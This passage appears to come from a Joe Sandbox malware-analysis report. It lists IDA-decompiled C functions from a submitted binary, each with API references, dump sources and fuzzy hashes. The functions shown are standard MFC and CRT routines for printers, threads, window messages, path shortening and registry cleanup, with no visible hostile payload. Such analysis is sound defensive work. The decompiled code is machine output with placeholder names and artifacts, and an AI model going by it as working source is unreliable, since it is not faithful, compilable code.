                  							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                  							 *(_t35 + 0x70) = _t20;
                  							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                  								E0041FD19( *(_t35 + 0x70));
                  								 *(_t35 + 0x70) = 0;
                  							}
                  							_t15 = ClosePrinter(_v8);
                  						}
                  					}
                  				}
                  				return _t15;
                  			}








                  APIs
                  • GlobalLock.KERNEL32 ref: 00414F67
                  • lstrcmpA.KERNEL32(?,?,?,?,?,?,?,00410705,?), ref: 00414F73
                  • OpenPrinterA.WINSPOOL.DRV(?,?,00000000,?,?,?,?,?,00410705,?), ref: 00414F85
                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?,?,00410705,?), ref: 00414FA5
                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00414FAD
                  • GlobalLock.KERNEL32 ref: 00414FB7
                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,00410705,?), ref: 00414FC4
                  • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,00410705,?), ref: 00414FDC
                    • Part of subcall function 0041FD19: GlobalFlags.KERNEL32(?), ref: 0041FD28
                    • Part of subcall function 0041FD19: GlobalUnlock.KERNEL32(?,?,00414FD6,?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,00410705), ref: 0041FD3A
                    • Part of subcall function 0041FD19: GlobalFree.KERNEL32 ref: 0041FD45
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                  • String ID:
                  • API String ID: 168474834-0
                  • Opcode ID: cdcf3c773ee7cde1bfdb72fb011224be38b68d7d2977b445d10daf31d4604e9f
                  • Instruction ID: 948f0dece0448d59d7c1233082a5740d041519e2e2aed2f4fe9fb02b6f449665
                  • Opcode Fuzzy Hash: cdcf3c773ee7cde1bfdb72fb011224be38b68d7d2977b445d10daf31d4604e9f
                  • Instruction Fuzzy Hash: 5811CE79600604BBDB229BB6DC49CBF7EEDFBC5704710042AFA06D2221D739CA42D728
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 66%
                  			E00433DA2(intOrPtr __edx, long _a4, char _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
                  				struct _SECURITY_ATTRIBUTES* _v0;
                  				DWORD* _v12;
                  				void* _v20;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t27;
                  				void* _t33;
                  				DWORD* _t38;
                  				intOrPtr* _t40;
                  				void* _t42;
                  				void* _t48;
                  				long _t51;
                  				void* _t61;
                  				intOrPtr _t62;
                  				intOrPtr* _t64;
                  				void* _t65;
                  
                  				_t58 = __edx;
                  				_push(_t64);
                  				E00435F8A();
                  				_t27 = E00435F6A(E00435F84());
                  				if(_t27 != 0) {
                  					_t51 = _a4;
                  					 *((intOrPtr*)(_t27 + 0x54)) =  *((intOrPtr*)(_t51 + 0x54));
                  					 *((intOrPtr*)(_t27 + 0x58)) =  *((intOrPtr*)(_t51 + 0x58));
                  					_t58 =  *((intOrPtr*)(_t51 + 4));
                  					_push(_t51);
                  					 *((intOrPtr*)(_t27 + 4)) =  *((intOrPtr*)(_t51 + 4));
                  					E00436192(_t48, _t61, _t64, __eflags);
                  				} else {
                  					_t64 = _a4;
                  					if(E00435FBE(E00435F84(), _t64) == 0) {
                  						ExitThread(GetLastError());
                  					}
                  					 *_t64 = GetCurrentThreadId();
                  				}
                  				_t73 =  *0x455824;
                  				if( *0x455824 != 0) {
                  					_t42 = E0043BEC0(_t73, 0x455824);
                  					_pop(_t51);
                  					_t74 = _t42;
                  					if(_t42 != 0) {
                  						 *0x455824();
                  					}
                  				}
                  				E00433D61(_t58, _t61, _t64, _t74);
                  				asm("int3");
                  				_push(_t51);
                  				_push(_t48);
                  				_push(_t61);
                  				_t9 =  &_v0; // 0x416327
                  				_t62 =  *_t9;
                  				_v20 = 0;
                  				_t75 = _t62;
                  				if(_t62 != 0) {
                  					_push(_t64);
                  					E00435F8A();
                  					_t65 = E004381D6(1, 0x214);
                  					__eflags = _t65;
                  					if(__eflags == 0) {
                  						L16:
                  						_push(_t65);
                  						E004316F6(0, _t62, _t65, __eflags);
                  						__eflags = _v12;
                  						if(_v12 != 0) {
                  							E00431D64(_v12);
                  						}
                  						_t33 = 0;
                  						__eflags = 0;
                  					} else {
                  						_push( *((intOrPtr*)(E00436178(0, _t58, _t62, __eflags) + 0x6c)));
                  						_push(_t65);
                  						E00436018(0, _t62, _t65, __eflags);
                  						 *(_t65 + 4) =  *(_t65 + 4) | 0xffffffff;
                  						 *((intOrPtr*)(_t65 + 0x58)) = _a12;
                  						_t38 = _a20;
                  						 *((intOrPtr*)(_t65 + 0x54)) = _t62;
                  						__eflags = _t38;
                  						if(_t38 == 0) {
                  							_t18 =  &_a8; // 0x416327
                  							_t38 = _t18;
                  						}
                  						_t33 = CreateThread(_v0, _a4, E00433DA2, _t65, _a16, _t38);
                  						__eflags = _t33;
                  						if(__eflags == 0) {
                  							_v12 = GetLastError();
                  							goto L16;
                  						}
                  					}
                  				} else {
                  					_t40 = E00431D3E(_t75);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					 *_t40 = 0x16;
                  					E004367E9(_t58, _t62, _t64);
                  					_t33 = 0;
                  				}
                  				return _t33;
                  			}






















                  APIs
                  • ___set_flsgetvalue.LIBCMT ref: 00433DA8
                    • Part of subcall function 00435F8A: TlsGetValue.KERNEL32(?,00436116,?,?,38A11573), ref: 00435F93
                    • Part of subcall function 00435F8A: __decode_pointer.LIBCMT ref: 00435FA5
                    • Part of subcall function 00435F8A: TlsSetValue.KERNEL32(00000000,?,38A11573), ref: 00435FB4
                  • ___fls_getvalue@4.LIBCMT ref: 00433DB3
                    • Part of subcall function 00435F6A: TlsGetValue.KERNEL32(?,?,00433DB8,00000000), ref: 00435F78
                  • ___fls_setvalue@8.LIBCMT ref: 00433DC6
                    • Part of subcall function 00435FBE: __decode_pointer.LIBCMT ref: 00435FCF
                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 00433DCF
                  • ExitThread.KERNEL32 ref: 00433DD6
                  • GetCurrentThreadId.KERNEL32 ref: 00433DDC
                  • __freefls@4.LIBCMT ref: 00433DFC
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00433E0F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                  • String ID:
                  • API String ID: 1925773019-0
                  • Opcode ID: c8c825772063ffb0e1c36542545d0ffbfd7b0d2f956fa4bcfaf61e1b123cdc9f
                  • Instruction ID: 4b48061d48abbb118d3af9a1d6b6224fcdbc60defc697df6f852148146c71389
                  • Opcode Fuzzy Hash: c8c825772063ffb0e1c36542545d0ffbfd7b0d2f956fa4bcfaf61e1b123cdc9f
                  • Instruction Fuzzy Hash: 41016734500A01AFC7047F62D90A95E7BE9AF4D30AF14956AF9048B323DB3DD942CAAD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E00429EA2(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
                  				signed int _v8;
                  				short _v72;
                  				char* _v76;
                  				signed int _v80;
                  				signed int* _v84;
                  				signed int _v88;
                  				intOrPtr _v92;
                  				void* __edi;
                  				signed int _t54;
                  				void* _t65;
                  				char* _t69;
                  				short* _t70;
                  				signed int _t72;
                  				signed int* _t83;
                  				short* _t84;
                  				void* _t93;
                  				signed int* _t101;
                  				signed int _t102;
                  				void** _t103;
                  				intOrPtr _t105;
                  				signed int _t107;
                  				signed int _t109;
                  				void* _t110;
                  
                  				_t104 = __esi;
                  				_t99 = __edx;
                  				_t82 = __ebx;
                  				_t54 =  *0x463404; // 0x38a11573
                  				_v8 = _t54 ^ _t109;
                  				_t103 = __ecx;
                  				_v76 = _a4;
                  				if(__ecx[1] != 0) {
                  					_push(__ebx);
                  					_push(__esi);
                  					_t83 = GlobalLock( *__ecx);
                  					_v84 = _t83;
                  					_v88 = 0 | _t83[0] == 0x0000ffff;
                  					_v80 = E00429CD6(_t83);
                  					_t105 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
                  					_v92 = _t105;
                  					if(_v88 == 0) {
                  						 *_t83 =  *_t83 | 0x00000040;
                  					} else {
                  						_t83[3] = _t83[3] | 0x00000040;
                  					}
                  					if(lstrlenA(_v76) >= 0x20) {
                  						L15:
                  						_t65 = 0;
                  					} else {
                  						_t69 = _t105 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
                  						_v76 = _t69;
                  						if(_t69 < _t105) {
                  							goto L15;
                  						} else {
                  							_t70 = E00429D1D(_t83);
                  							_t93 = 0;
                  							_t84 = _t70;
                  							if(_v80 != 0) {
                  								_t93 = _t105 + 2 + E00431BE4(_t84 + _t105) * 2;
                  							}
                  							_t33 =  &(_v76[3]); // 0x3
                  							_t101 = _v84;
                  							_t36 = _t84 + 3; // 0x3
                  							_t72 = _t93 + _t36 & 0xfffffffc;
                  							_t107 = _t84 + _t33 & 0xfffffffc;
                  							_v80 = _t72;
                  							if(_v88 == 0) {
                  								_t102 =  *(_t101 + 8) & 0x0000ffff;
                  							} else {
                  								_t102 =  *(_t101 + 0x10) & 0x0000ffff;
                  							}
                  							if(_v76 == _t93 || _t102 <= 0) {
                  								L17:
                  								 *_t84 = _a8;
                  								_t99 =  &_v72;
                  								E0041E0F0(_t103, _t107, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
                  								_t103[1] = _t103[1] + _t107 - _v80;
                  								GlobalUnlock( *_t103);
                  								_t103[2] = _t103[2] & 0x00000000;
                  								_t65 = 1;
                  							} else {
                  								_t99 = _t103[1];
                  								_t97 = _t99 - _t72 + _v84;
                  								if(_t99 - _t72 + _v84 <= _t99) {
                  									E0041E0F0(_t103, _t107, _t107, _t97, _t72, _t97);
                  									_t110 = _t110 + 0x10;
                  									goto L17;
                  								} else {
                  									goto L15;
                  								}
                  							}
                  						}
                  					}
                  					_pop(_t104);
                  					_pop(_t82);
                  				} else {
                  					_t65 = 0;
                  				}
                  				return E00430650(_t65, _t82, _v8 ^ _t109, _t99, _t103, _t104);
                  			}



























                  APIs
                  • GlobalLock.KERNEL32 ref: 00429ECE
                  • lstrlenA.KERNEL32(?), ref: 00429F19
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00429F33
                  • _wcslen.LIBCMT ref: 00429F57
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
                  • String ID: System
                  • API String ID: 4253822919-3470857405
                  • Opcode ID: f20dbc8f9ba238a26da2406e4875a9fc71124662fb509fc0612855e41ff5078a
                  • Instruction ID: efb83644c2112a5dfae5475b0fc38a031e3ec5a019a84b7450d3f46c2a4277a5
                  • Opcode Fuzzy Hash: f20dbc8f9ba238a26da2406e4875a9fc71124662fb509fc0612855e41ff5078a
                  • Instruction Fuzzy Hash: 81411471A002259FCB14DFA1D985AAEFBB4FF04304F54812AE412DB285E7789D45CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E0040E9F9(intOrPtr* __ecx, signed int _a4) {
                  				int _v8;
                  				int _v12;
                  				int _v16;
                  				struct tagMSG* _v20;
                  				struct HWND__* _v24;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct HWND__* _t48;
                  				struct tagMSG* _t49;
                  				signed int _t51;
                  				void* _t54;
                  				void* _t56;
                  				int _t59;
                  				long _t62;
                  				signed int _t66;
                  				void* _t69;
                  				intOrPtr* _t71;
                  				intOrPtr* _t74;
                  
                  				_t70 = __ecx;
                  				_t74 = __ecx;
                  				_v16 = 1;
                  				_v12 = 0;
                  				if((_a4 & 0x00000004) == 0) {
                  					L2:
                  					_v8 = 0;
                  					L3:
                  					_t48 = GetParent( *(_t74 + 0x20));
                  					 *(_t74 + 0x3c) =  *(_t74 + 0x3c) | 0x00000018;
                  					_v24 = _t48;
                  					_t49 = E00415AE2(_t76);
                  					_t69 = UpdateWindow;
                  					_v20 = _t49;
                  					while(1) {
                  						_t77 = _v16;
                  						if(_v16 == 0) {
                  							goto L15;
                  						}
                  						while(1) {
                  							L15:
                  							_t51 = E00416049(_t70, 0, _t74, _t77);
                  							if(_t51 == 0) {
                  								break;
                  							}
                  							if(_v8 != 0) {
                  								_t59 = _v20->message;
                  								if(_t59 == 0x118 || _t59 == 0x104) {
                  									E00412C34(_t74, 1);
                  									UpdateWindow( *(_t74 + 0x20));
                  									_v8 = 0;
                  								}
                  							}
                  							_t71 = _t74;
                  							_t54 =  *((intOrPtr*)( *_t74 + 0x88))();
                  							_t82 = _t54;
                  							if(_t54 == 0) {
                  								_t45 = _t74 + 0x3c;
                  								 *_t45 =  *(_t74 + 0x3c) & 0xffffffe7;
                  								__eflags =  *_t45;
                  								return  *((intOrPtr*)(_t74 + 0x44));
                  							} else {
                  								_push(_v20);
                  								_t56 = E00415EC6(_t69, _t71, 0, _t74, _t82);
                  								_pop(_t70);
                  								if(_t56 != 0) {
                  									_v16 = 1;
                  									_v12 = 0;
                  								}
                  								if(PeekMessageA(_v20, 0, 0, 0, 0) == 0) {
                  									while(1) {
                  										_t77 = _v16;
                  										if(_v16 == 0) {
                  											goto L15;
                  										}
                  										goto L4;
                  									}
                  								}
                  								continue;
                  							}
                  						}
                  						_push(0);
                  						E00414E3D();
                  						return _t51 | 0xffffffff;
                  						L4:
                  						__eflags = PeekMessageA(_v20, 0, 0, 0, 0);
                  						if(__eflags != 0) {
                  							goto L15;
                  						} else {
                  							__eflags = _v8;
                  							if(_v8 != 0) {
                  								_t70 = _t74;
                  								E00412C34(_t74, 1);
                  								UpdateWindow( *(_t74 + 0x20));
                  								_v8 = 0;
                  							}
                  							__eflags = _a4 & 0x00000001;
                  							if((_a4 & 0x00000001) == 0) {
                  								__eflags = _v24;
                  								if(_v24 != 0) {
                  									__eflags = _v12;
                  									if(_v12 == 0) {
                  										SendMessageA(_v24, 0x121, 0,  *(_t74 + 0x20));
                  									}
                  								}
                  							}
                  							__eflags = _a4 & 0x00000002;
                  							if(__eflags != 0) {
                  								L13:
                  								_v16 = 0;
                  								continue;
                  							} else {
                  								_t62 = SendMessageA( *(_t74 + 0x20), 0x36a, 0, _v12);
                  								_v12 = _v12 + 1;
                  								__eflags = _t62;
                  								if(__eflags != 0) {
                  									continue;
                  								}
                  								goto L13;
                  							}
                  						}
                  					}
                  				}
                  				_t66 = E00412B38(__ecx);
                  				_v8 = 1;
                  				_t76 = _t66 & 0x10000000;
                  				if((_t66 & 0x10000000) == 0) {
                  					goto L3;
                  				}
                  				goto L2;
                  			}

                  APIs
                  • GetParent.USER32(?), ref: 0040EA2C
                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040EA50
                  • UpdateWindow.USER32(?), ref: 0040EA6B
                  • SendMessageA.USER32(?,00000121,00000000,?), ref: 0040EA8C
                  • SendMessageA.USER32(?,0000036A,00000000,00000002), ref: 0040EAA4
                  • UpdateWindow.USER32(?), ref: 0040EAE7
                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040EB18
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$Window$PeekSendUpdate$LongParent
                  • String ID:
                  • API String ID: 2853195852-0
                  • Opcode ID: c229e80b1f278fb07b4cfe83ed8274fb3bea46c667a2c2ac9cca65a0f4ede5b8
                  • Instruction ID: 9cec2da762fcf1ae17ec792ded61e67ab4686bf0a0b4de212a99b23e2336cc78
                  • Opcode Fuzzy Hash: c229e80b1f278fb07b4cfe83ed8274fb3bea46c667a2c2ac9cca65a0f4ede5b8
                  • Instruction Fuzzy Hash: C5418D30A00245ABCB21DFA7C944AAFBFB4FF85704F10892EE541B22E1D7799950CF19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E004268B6(void* __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t32;
                  				void* _t34;
                  				intOrPtr _t35;
                  				char* _t36;
                  				int _t38;
                  				CHAR* _t40;
                  				CHAR* _t47;
                  				void* _t49;
                  				void* _t51;
                  				intOrPtr _t54;
                  				intOrPtr _t57;
                  				intOrPtr _t61;
                  				void* _t62;
                  				CHAR* _t64;
                  				void* _t66;
                  				int _t67;
                  				intOrPtr _t68;
                  
                  				_t62 = __edx;
                  				_push(__ecx);
                  				_push(__ecx);
                  				_push(_t49);
                  				_push(_t66);
                  				_t64 = _a4;
                  				_push(0xffffffff);
                  				_t32 = E00424A91(_t64);
                  				_t76 = _t32;
                  				if(_t32 == 0) {
                  					E00406436(_t49, __ecx, _t64, _t66, _t76);
                  				}
                  				_t67 = lstrlenA(_t64);
                  				_v8 = _t67;
                  				_t34 = E0042FDDC(_t64, 0, 0);
                  				_t57 = _v8;
                  				_t51 = _t34 - 1;
                  				_t68 = _t67 - _t51;
                  				_t35 = _t68 + _t64;
                  				_v12 = _t35;
                  				if(_a8 < _t57) {
                  					if(_a8 >= _t51) {
                  						__eflags =  *_t64 - 0x5c;
                  						_t36 =  &(_t64[2]);
                  						_a4 = _t36;
                  						if( *_t64 == 0x5c) {
                  							__eflags = _t64[1] - 0x5c;
                  							if(_t64[1] == 0x5c) {
                  								while(1) {
                  									__eflags =  *_t36 - 0x5c;
                  									if( *_t36 == 0x5c) {
                  										goto L13;
                  									}
                  									_t36 = E004348EB(_t62, _t64, _a4);
                  									_a4 = _t36;
                  								}
                  							}
                  						}
                  						L13:
                  						__eflags = _t68 - 3;
                  						if(_t68 > 3) {
                  							do {
                  								_t47 = E004348EB(_t62, _t64, _a4);
                  								__eflags =  *_t47 - 0x5c;
                  								_a4 = _t47;
                  							} while ( *_t47 != 0x5c);
                  						}
                  						_t68 = _a4 - _t64;
                  						__eflags = _a8 - _t68 + _t51 + 5;
                  						if(_a8 >= _t68 + _t51 + 5) {
                  							while(1) {
                  								_t38 = lstrlenA(_a4);
                  								__eflags = _t38 + _t68 + 4 - _a8;
                  								if(_t38 + _t68 + 4 > _a8) {
                  									goto L18;
                  								} else {
                  									break;
                  								}
                  								do {
                  									L18:
                  									_t40 = E004348EB(_t62, _t64, _a4);
                  									__eflags =  *_t40 - 0x5c;
                  									_a4 = _t40;
                  								} while ( *_t40 != 0x5c);
                  							}
                  							__eflags = _t68;
                  							if(_t68 < 0) {
                  								L22:
                  								_t68 = _a8;
                  							} else {
                  								__eflags = _t68 - _a8;
                  								if(_t68 >= _a8) {
                  									goto L22;
                  								}
                  							}
                  							_t54 = _v8;
                  							E004059F9(_t64, _t68 + _t64, _t68 + _t64, _t54 - _t68 + 1, "\\...", 5);
                  							__eflags = _t54 + 1;
                  							_t35 = E0040490E(_t54 + 1, _t62, _t64, _t68 + _t64, _t64, _t54 + 1, _a4);
                  						} else {
                  							_push(_v12);
                  							_push(_v8 + 1);
                  							goto L7;
                  						}
                  					} else {
                  						if(_a12 != 0) {
                  							_push(_t35);
                  							_t61 = _t57 + 1;
                  							__eflags = _t61;
                  							_push(_t61);
                  							L7:
                  							_push(_t64);
                  							_t35 = E00414FEE(_t51, _t62, _t64, _t68);
                  						} else {
                  							 *_t64 = 0;
                  						}
                  					}
                  				}
                  				return _t35;
                  			}

                  APIs
                  • lstrlenA.KERNEL32(?,?,000000FF), ref: 004268D5
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                    • Part of subcall function 00414FEE: _strcpy_s.LIBCMT ref: 00414FFC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Exception@8H_prolog3Throw_strcpy_slstrlen
                  • String ID: \...
                  • API String ID: 2411880420-1167917071
                  • Opcode ID: 5c1896904efdc8856ffc91947ccfd4409c0691e1e4a669871dd6449de70afc12
                  • Instruction ID: 209274568c99b8f927e6ccd35cc04ed4cda3847a283bcf010ece59bbc5279a2f
                  • Opcode Fuzzy Hash: 5c1896904efdc8856ffc91947ccfd4409c0691e1e4a669871dd6449de70afc12
                  • Instruction Fuzzy Hash: 1A311BB1A00269BFDF119F15DC40AAE7B64EB41358F52812FFC159B241DB389EC1CB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040EF7F(intOrPtr* __ecx) {
                  				struct HWND__* _v40;
                  				struct HWND__* _v44;
                  				intOrPtr _v48;
                  				void* _v52;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				long _t34;
                  				long _t43;
                  				struct HWND__* _t48;
                  				intOrPtr* _t63;
                  				signed int _t64;
                  				void* _t69;
                  				intOrPtr _t71;
                  				intOrPtr* _t72;
                  
                  				_t72 = __ecx;
                  				_t69 = E00415AD9();
                  				if(_t69 != 0) {
                  					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
                  						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                  					}
                  					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
                  						 *((intOrPtr*)(_t69 + 0x24)) = 0;
                  					}
                  				}
                  				_t63 =  *((intOrPtr*)(_t72 + 0x48));
                  				if(_t63 != 0) {
                  					 *((intOrPtr*)( *_t63 + 0x50))();
                  					 *((intOrPtr*)(_t72 + 0x48)) = 0;
                  				}
                  				_t64 =  *(_t72 + 0x4c);
                  				if(_t64 != 0) {
                  					 *((intOrPtr*)( *_t64 + 4))(1);
                  				}
                  				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
                  				_t83 =  *(_t72 + 0x3c) & 1;
                  				if(( *(_t72 + 0x3c) & 1) != 0) {
                  					_t71 =  *((intOrPtr*)(E0041F396(1, _t64, _t69, _t72, _t83) + 0x3c));
                  					if(_t71 != 0) {
                  						_t85 =  *(_t71 + 0x20);
                  						if( *(_t71 + 0x20) != 0) {
                  							E00431160(_t71,  &_v52, 0, 0x30);
                  							_t48 =  *(_t72 + 0x20);
                  							_v44 = _t48;
                  							_v40 = _t48;
                  							_v52 = 0x2c;
                  							_v48 = 1;
                  							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
                  						}
                  					}
                  				}
                  				_t34 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
                  				_t61 = _t34;
                  				E0040ED96(_t72, _t85);
                  				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t34) {
                  					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf8))());
                  					if(_t43 != 0) {
                  						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
                  					}
                  				}
                  				E0040EEC5(_t61, _t72);
                  				return  *((intOrPtr*)( *_t72 + 0x11c))();
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: LongWindow$MessageSend_memset
                  • String ID: ,
                  • API String ID: 2997958587-3772416878
                  • Opcode ID: b20ac35b66c4cdd383068926631af7f25a1f3221c8ae416a670efe0955ee868a
                  • Instruction ID: 7f9eb07dc8cd5887cb77f9411831f1f819b3d5f976bf49b5c8f03c9bda67ac66
                  • Opcode Fuzzy Hash: b20ac35b66c4cdd383068926631af7f25a1f3221c8ae416a670efe0955ee868a
                  • Instruction Fuzzy Hash: 0131A331600715AFCB20AF76C884A6AB7E4BF48314F15093EF545A7BD2DB39E815CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 70%
                  			E00416B30(void* __ebx, void* __ecx, void __edx, void* __edi, void* __esi, void* __eflags) {
                  				void _t36;
                  				void* _t46;
                  				long _t60;
                  				void* _t65;
                  				void* _t81;
                  				void* _t82;
                  				intOrPtr _t90;
                  
                  				_t77 = __edx;
                  				_t68 = __ecx;
                  				_t67 = __ebx;
                  				_push(0x124);
                  				E00431B04(E0044B492, __ebx, __edi, __esi);
                  				_t81 = __ecx;
                  				 *(_t82 - 0x120) = 0;
                  				 *(_t82 - 0x12c) = 0;
                  				_t36 = E004165DF(__ecx, __edx);
                  				 *(_t82 - 0x128) = _t36;
                  				if(_t36 != 0) {
                  					do {
                  						_t65 = _t82 - 0x128;
                  						_push(_t65);
                  						_t68 = _t81;
                  						E004165F0();
                  						if(_t65 != 0) {
                  							_t77 =  *_t65;
                  							_t68 = _t65;
                  							 *((intOrPtr*)( *_t65 + 0xc))(0, 0xfffffffc, 0, 0);
                  						}
                  					} while ( *(_t82 - 0x128) != 0);
                  				}
                  				if( *((intOrPtr*)(_t81 + 0x54)) != 0) {
                  					_t90 =  *((intOrPtr*)(_t81 + 0x68));
                  					_t91 = _t90 == 0;
                  					if(_t90 == 0) {
                  						E00406436(_t67, _t68, 0, _t81, _t91);
                  					}
                  					_push("Software\\");
                  					E00406039(_t67, _t82 - 0x11c, _t77, 0, _t81, _t91);
                  					 *((intOrPtr*)(_t82 - 4)) = 0;
                  					E00405EC1(_t82 - 0x11c,  *((intOrPtr*)(_t81 + 0x54)));
                  					_push("\\");
                  					_push(_t82 - 0x11c);
                  					_push(_t82 - 0x130);
                  					_t46 = E00416856(_t67, 0, _t81, _t91);
                  					_push( *((intOrPtr*)(_t81 + 0x68)));
                  					 *((char*)(_t82 - 4)) = 1;
                  					_push(_t46);
                  					_push(_t82 - 0x124);
                  					E00416856(_t67, 0, _t81, _t91);
                  					 *((char*)(_t82 - 4)) = 3;
                  					E004010B0( *((intOrPtr*)(_t82 - 0x130)) + 0xfffffff0, _t77);
                  					_push(_t82 - 0x124);
                  					_t81 = 0x80000001;
                  					_push(0x80000001);
                  					E00416900(_t67, _t77, 0, 0x80000001, _t91);
